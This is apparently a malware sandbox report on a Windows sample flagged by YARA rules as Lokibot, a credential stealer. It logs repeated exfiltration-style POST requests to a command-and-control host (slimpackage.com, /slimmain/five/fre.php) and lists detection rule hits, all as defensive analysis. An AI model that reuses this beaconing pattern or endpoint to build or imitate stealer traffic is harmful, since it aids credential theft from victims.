                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    49 | 192.168.2.3 | 49858 | 104.223.93.105 | 80 | C:\Users\user\Desktop\__.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 09:26:07.901534081 CET | 10820 | OUT | POST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:26:08.157304049 CET | 10821 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:26:07 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    5 | 192.168.2.3 | 49748 | 104.223.93.105 | 80 | C:\Users\user\Desktop\__.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 09:24:29.242786884 CET | 1035 | OUT | POST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:24:29.497827053 CET | 1036 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:24:28 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    50 | 192.168.2.3 | 49859 | 104.223.93.105 | 80 | C:\Users\user\Desktop\__.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 09:26:09.260756969 CET | 10822 | OUT | POST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:26:09.516175032 CET | 10822 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:26:08 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    51 | 192.168.2.3 | 49860 | 104.223.93.105 | 80 | C:\Users\user\Desktop\__.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 09:26:10.842581034 CET | 10823 | OUT | POST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:26:11.103255033 CET | 10824 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:26:10 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    52 | 192.168.2.3 | 49861 | 104.223.93.105 | 80 | C:\Users\user\Desktop\__.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 09:26:12.247627974 CET | 10824 | OUT | POST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:26:12.540654898 CET | 10825 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:26:11 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    53 | 192.168.2.3 | 49862 | 104.223.93.105 | 80 | C:\Users\user\Desktop\__.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 09:26:13.817317009 CET | 10826 | OUT | POST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:26:14.092477083 CET | 10826 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:26:13 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    54 | 192.168.2.3 | 49863 | 104.223.93.105 | 80 | C:\Users\user\Desktop\__.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 09:26:15.234067917 CET | 10827 | OUT | POST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:26:15.487595081 CET | 10828 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:26:14 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    55 | 192.168.2.3 | 49864 | 104.223.93.105 | 80 | C:\Users\user\Desktop\__.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 09:26:16.746339083 CET | 10829 | OUT | POST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:26:17.038023949 CET | 10829 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:26:15 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    6 | 192.168.2.3 | 49749 | 104.223.93.105 | 80 | C:\Users\user\Desktop\__.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 09:24:31.358483076 CET | 1036 | OUT | POST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:24:31.613352060 CET | 1037 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:24:30 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    7 | 192.168.2.3 | 49750 | 104.223.93.105 | 80 | C:\Users\user\Desktop\__.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 09:24:32.843753099 CET | 1134 | OUT | POST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:24:33.104927063 CET | 1135 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:24:32 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    8 | 192.168.2.3 | 49751 | 104.223.93.105 | 80 | C:\Users\user\Desktop\__.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 09:24:34.253885984 CET | 1136 | OUT | POST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:24:34.548223019 CET | 1136 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:24:33 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    9 | 192.168.2.3 | 49752 | 104.223.93.105 | 80 | C:\Users\user\Desktop\__.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 09:24:35.721894026 CET | 1137 | OUT | POST /slimmain/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: CC3B1AE
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 09:24:35.982877970 CET | 1137 | IN | HTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 08:24:34 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Code Manipulations

                    Statistics

                    Behavior

                    System Behavior

                    General

                    Start time:09:24:12
                    Start date:14/01/2022
                    Path:C:\Users\user\Desktop\__.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\__.exe"
                    Imagebase:0x400000
                    File size:238317 bytes
                    MD5 hash:E9B74BFB67BF3DCEF39E23674D4DD63F
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000002.00000002.299558111.00000000023E0000.00000004.00000001.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.299558111.00000000023E0000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000002.299558111.00000000023E0000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000002.299558111.00000000023E0000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000002.299558111.00000000023E0000.00000004.00000001.sdmp, Author: kevoreilly
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000002.299558111.00000000023E0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:low

                    General

                    Start time:09:24:13
                    Start date:14/01/2022
                    Path:C:\Users\user\Desktop\__.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\__.exe"
                    Imagebase:0x400000
                    File size:238317 bytes
                    MD5 hash:E9B74BFB67BF3DCEF39E23674D4DD63F
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000003.00000002.553223743.00000000007A7000.00000004.00000020.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000000.293455627.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000003.00000000.293455627.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000003.00000000.293455627.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: Loki_1, Description: Loki Payload, Source: 00000003.00000000.293455627.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000003.00000000.293455627.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000003.00000003.316225767.00000000007BD000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000000.294708391.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000003.00000000.294708391.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000003.00000000.294708391.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: Loki_1, Description: Loki Payload, Source: 00000003.00000000.294708391.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000003.00000000.294708391.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000000.296551442.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000003.00000000.296551442.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000003.00000000.296551442.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: Loki_1, Description: Loki Payload, Source: 00000003.00000000.296551442.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000003.00000000.296551442.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000001.298801287.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000003.00000001.298801287.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000003.00000001.298801287.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: Loki_1, Description: Loki Payload, Source: 00000003.00000001.298801287.0000000000400000.00000040.00020000.sdmp, Author: kevoreilly
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000003.00000001.298801287.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000000.295652868.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000003.00000000.295652868.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000003.00000000.295652868.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: Loki_1, Description: Loki Payload, Source: 00000003.00000000.295652868.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000003.00000000.295652868.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.553100353.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000003.00000002.553100353.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000003.00000002.553100353.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: Loki_1, Description: Loki Payload, Source: 00000003.00000002.553100353.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000003.00000002.553100353.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:low

                    Disassembly

                    Code Analysis
